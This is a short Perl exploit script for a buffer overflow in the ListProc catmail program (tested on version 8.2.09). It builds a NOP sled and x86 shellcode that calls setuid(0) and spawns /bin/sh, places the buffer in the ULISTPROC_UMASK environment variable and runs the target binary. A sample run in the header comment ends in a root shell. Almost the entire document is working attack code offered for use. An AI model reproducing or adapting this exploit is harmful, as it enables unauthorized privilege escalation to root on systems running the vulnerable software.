#!/usr/bin/perl # # Quick hack for the ListProc catmail overflow found by KF (dotslash@snosoft.com) # Written by zillion (zillion@safemode.org) on July 23, 2002 # # Tested on version 8.2.09 # # [zillion@ghetto lp8]$ ./expl.pl -f ./catmail # The new return address: 0xbfffae1c # sh-2.05# id # uid=0(root) gid=1214(snosoft) groups=1214(snosoft),520(zillion) $shellcode = "\xeb\x26\x5e\x31\xc0\x89\xc3\x89\xc1\x89\xc2\xb0\xa4\xcd\x80". "\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b". "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xd5\xff\xff\xff". "\x2f\x62\x69\x6e\x2f\x73\x68"; while($_ = $ARGV[0], /^-/) { shift; last if /^--$/; /^-f/ && do { $file = shift; }; /^-o/ && do { $off = shift; }; /^-h/ && do { &usage; }; } if(!$file) { &usage(); } $off = -1000 if(!$off); $esp = 0xbfffb204; for ($i = 0; $i < (16542 - length($shellcode)); $i++) { $buffer .= "\x90"; } $buffer .= $shellcode; $buffer .= pack('l', ($esp + $off)); $buffer .= pack('l', ($esp + $off)); $ENV{'ULISTPROC_UMASK'} = $buffer; $ENV{'LPDIR'} = "/tmp"; print("The new return address: 0x", sprintf('%lx',($esp + $off)), "\n"); exec("$file"); sub usage() { print "\n$0 -f /path/to/catmail\n"; print "$0 -f /path/to/catmail -o \n\n"; exit; }